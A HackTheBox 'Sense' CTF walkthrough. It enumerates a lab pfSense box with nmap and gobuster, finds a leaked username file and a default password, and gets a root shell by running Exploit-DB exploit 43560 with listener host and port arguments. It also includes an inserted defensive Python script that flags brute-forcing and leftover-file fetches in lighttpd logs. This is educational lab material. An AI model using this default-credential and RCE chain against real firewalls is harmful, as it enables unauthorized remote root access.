HackTheBox: Sense — Walkthrough

Sanaullah Aman Korai
3 min read · Jun 29, 2023


Sense! An easy-rated machine that can be both simple and hard at the same time. Enumeration is a heavy factor in this box, so make sure you don’t overlook anything! Missing one simple detail might result in countless hours of wasteful searching and mashing of the keyboard :). Without further ado, let’s get right into it!

Let’s get started with Nmap:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-29 16:58 EDT
Nmap scan report for 10.10.10.60
Host is up (0.35s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open ssl/http lighttpd 1.4.35
|_http-title: Login
|_http-server-header: lighttpd/1.4.35
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after: 2023-04-06T19:21:35

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.99 seconds

The scan yields two open ports, HTTP on 80 and HTTPS on 443, both served by lighttpd 1.4.35; port 80 only redirects to HTTPS.

This shows us that there is a login panel. First I tried the usual authentication bypasses against it, but had no luck, so I started fuzzing for directories.

gobuster -u https://10.10.10.60/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e
Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : https://10.10.10.60/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
[+] Expanded : true
=====================================================
https://10.10.10.60/themes (Status: 301)
https://10.10.10.60/css (Status: 301)
https://10.10.10.60/includes (Status: 301)
https://10.10.10.60/javascript (Status: 301)
https://10.10.10.60/classes (Status: 301)
...[MORE OUTPUT REDACTED]...

It took some time to inspect all of the directories, to no avail: they either return 404 or redirect back to the login page. For my second attempt I run gobuster once again, but this time with the -x option to look for specific file extensions as well. Extensions such as .php, .txt, .sh and .bak are always good choices, because lazy sysadmins often leave files lying around. What a shame, right?

gobuster -u https://10.10.10.60/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -x txt
Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : https://10.10.10.60/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
[+] Extensions : .txt
[+] Expanded : true
=====================================================
https://10.10.10.60/themes (Status: 301)
...
...
https://10.10.10.60/changelog.txt (Status: 200)
...
https://10.10.10.60/system-users.txt (Status: 200)
...
...

As you can see, we now get two new hits: changelog.txt and system-users.txt. Let’s check them out.
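Seen from the server side, this enumeration leaves an unmistakable trace in the web server's access log: a single client producing a burst of 404s, followed by 200s for files that should never sit in a webroot. The script below is an added example written for this walkthrough, not code from the original post or from pfSense/lighttpd. It assumes lighttpd is writing combined-format access logs (the stock mod_accesslog format); the log lines, the brute-force threshold and the list of "leftover" extensions are constructed for illustration.

```python
"""Spot directory brute-forcing and hits on leftover files in lighttpd access logs."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined log format as emitted by lighttpd's mod_accesslog (assumption: stock format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Extensions that have no business being served from a webroot (illustrative list).
LEFTOVER_RE = re.compile(r'\.(txt|bak|old|sh|sql|zip)$', re.IGNORECASE)

NOT_FOUND_THRESHOLD = 10   # this many 404s from one client ...
WINDOW_SECONDS = 60        # ... inside a window of this many seconds


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def analyse(lines):
    """Return a list of (kind, client_ip, detail) findings, in log order."""
    findings = []
    recent_404 = defaultdict(deque)   # client ip -> timestamps of its recent 404s
    flagged = set()                   # clients already reported as brute-forcing
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path, status = rec["ip"], rec["ts"], rec["path"], rec["status"]
        if status == 404:
            window = recent_404[ip]
            window.append(ts)
            while (ts - window[0]).total_seconds() > WINDOW_SECONDS:
                window.popleft()
            if len(window) >= NOT_FOUND_THRESHOLD and ip not in flagged:
                flagged.add(ip)
                findings.append(("bruteforce", ip, f"{len(window)} 404s in {WINDOW_SECONDS}s"))
        elif status == 200 and LEFTOVER_RE.search(path.split("?")[0]):
            # A successful fetch of a .txt/.bak/... file is the interesting event,
            # regardless of whether the client was also brute-forcing.
            findings.append(("leftover-file", ip, path))
    return findings


def _line(ip, sec, path, status, ua="Mozilla/5.0"):
    """Build one constructed combined-format log line (sample data, not real traffic)."""
    return (f'{ip} - - [29/Jun/2023:16:59:{sec:02d} -0400] "GET {path} HTTP/1.1" '
            f'{status} 0 "-" "{ua}"')


# Constructed sample: ten misses in ten seconds, a redirect, two leftover files, and
# one ordinary visitor who must not be flagged.
SAMPLE_LOG = [_line("10.10.14.9", i, f"/{w}", 404) for i, w in enumerate(
    ["admin", "backup", "test", "dev", "old", "conf", "private", "tmp", "data", "secret"])]
SAMPLE_LOG += [
    _line("10.10.14.9", 11, "/themes", 301),
    _line("10.10.14.9", 12, "/changelog.txt", 200),
    _line("10.10.14.9", 13, "/system-users.txt", 200),
    _line("10.10.10.5", 14, "/index.php", 200),
]

if __name__ == "__main__":
    for kind, ip, detail in analyse(SAMPLE_LOG):
        print(f"{kind:14} {ip:12} {detail}")
```

In production the threshold would be tuned against normal 404 noise, and the "leftover-file" rule is better applied as a periodic check of the webroot itself (anything matching those extensions should not be there in the first place) than as a log alert after the file has already been fetched.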

So the user is rohit and the company’s default password is pfsense. Let’s see if it works.

Bingo, we are in. The page shows the version number, so I searched for exploits online and found an RCE:

https://www.exploit-db.com/exploits/43560

Download the exploit and run it.

searchsploit -m php/webapps/43560.py

Now run the exploit, making sure your listener is already running.

python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.9 --lport 1337 --username rohit --password pfsense

Boom, we are in as root; there is no need for privilege escalation. You can find the flags in /home/rohit/user.txt and /root/root.txt.
